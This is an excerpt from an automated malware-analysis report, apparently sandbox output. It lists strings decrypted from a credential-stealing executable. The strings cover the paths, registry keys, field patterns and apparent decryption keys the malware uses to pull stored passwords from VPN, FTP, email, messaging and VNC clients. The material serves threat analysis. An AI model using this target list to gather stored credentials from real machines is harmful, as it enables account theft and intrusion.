                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ALLUSERSPROFILE
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: global
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: accounts
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: account.
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: username
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: account.
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Psi/Psi+
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: name
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Psi/Psi+
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: APPDATA
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Psi\profiles
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: APPDATA
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Psi+\profiles
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \accounts.xml
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \accounts.xml
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: OpenVPN
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: username
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: auth-data
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: entropy
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: USERPROFILE
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \OpenVPN\config\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: remote
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: remote
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: NordVPN
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: NordVPN
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: NordVpn.exe*
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: user.config
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: //setting[@name='Username']/value
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: //setting[@name='Password']/value
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: NordVPN
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Private Internet Access
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: %ProgramW6432%
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Private Internet Access\data
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Private Internet Access\data
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \account.json
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: .*"username":"(.*?)"
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: .*"password":"(.*?)"
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Private Internet Access
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: privateinternetaccess.com
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: FileZilla
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: APPDATA
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: APPDATA
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <Server>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <Host>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <Host>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </Host>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <Port>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </Port>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <User>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <User>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </User>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </Pass>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <Pass>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </Pass>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: CoreFTP
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: User
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Host
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Port
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: hdfzpysvpzimorhk
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: WinSCP
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: HostName
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UserName
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: PublicKeyFile
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: PortNumber
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: WinSCP
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ABCDEF
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Flash FXP
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: port
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: user
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: pass
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: quick.dat
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Sites.dat
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \FlashFXP\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \FlashFXP\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: FTP Navigator
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Server
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: No Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: User
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SmartFTP
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: APPDATA
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: WS_FTP
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: appdata
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: HOST
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: PWD=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: PWD=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: FtpCommander
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \cftp\Ftplist.txt
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ;Password=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ;User=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ;Server=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ;Port=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ;Port=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ;Password=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ;User=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ;Anonymous=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: FTPGetter
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \FTPGetter\servers.xml
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <server>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <server_ip>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <server_ip>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </server_ip>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <server_port>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </server_port>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <server_user_name>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <server_user_name>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </server_user_name>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <server_user_password>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <server_user_password>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </server_user_password>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: FTPGetter
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: The Bat!
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: appdata
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \The Bat!
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Account.CFN
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Account.CFN
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Becky!
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: DataDir
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Folder.lst
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Mailbox.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Account
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: PassWd
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Account
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SMTPServer
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Account
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: MailAddress
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Becky!
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Outlook
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Email
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: IMAP Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: POP3 Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: HTTP Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SMTP Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Email
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Email
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Email
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: IMAP Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: POP3 Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: HTTP Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SMTP Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Server
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Windows Mail App
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Email
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Server
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SchemaId
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: pResourceElement
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: pIdentityElement
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: pPackageSid
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: pAuthenticatorElement
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: syncpassword
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: mailoutgoing
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: FoxMail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Executable
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: FoxmailPath
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Storage\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Storage\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \mail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \mail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Accounts\Account.rec0
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Accounts\Account.rec0
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Account.stg
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Account.stg
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: POP3Host
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SMTPHost
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: IncomingServer
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Account
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: MailAddress
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: POP3Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Opera Mail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: opera:
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: PocoMail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: appdata
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Pocomail\accounts.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Email
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: POPPass
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SMTPPass
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SMTP
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: eM Client
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: eM Client\accounts.dat
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: eM Client
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Accounts
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: "Username":"
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: "Secret":"
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: "ProviderName":"
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: o6806642kbM7c5
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Mailbird
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SenderIdentities
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Accounts
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Mailbird\Store\Store.db
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Server_Host
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Accounts
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Email
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Username
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: EncryptedPassword
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Mailbird
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: RealVNC 4.x
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: RealVNC 3.x
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: RealVNC 4.x
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: RealVNC 3.x
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\ORL\WinVNC3
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: TightVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\TightVNC\Server
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: TightVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\TightVNC\Server
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: PasswordViewOnly
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: TightVNC ControlPassword
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\TightVNC\Server
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ControlPassword
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: TigerVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\TigerVNC\Server
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: passwd
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: passwd2
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: passwd
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
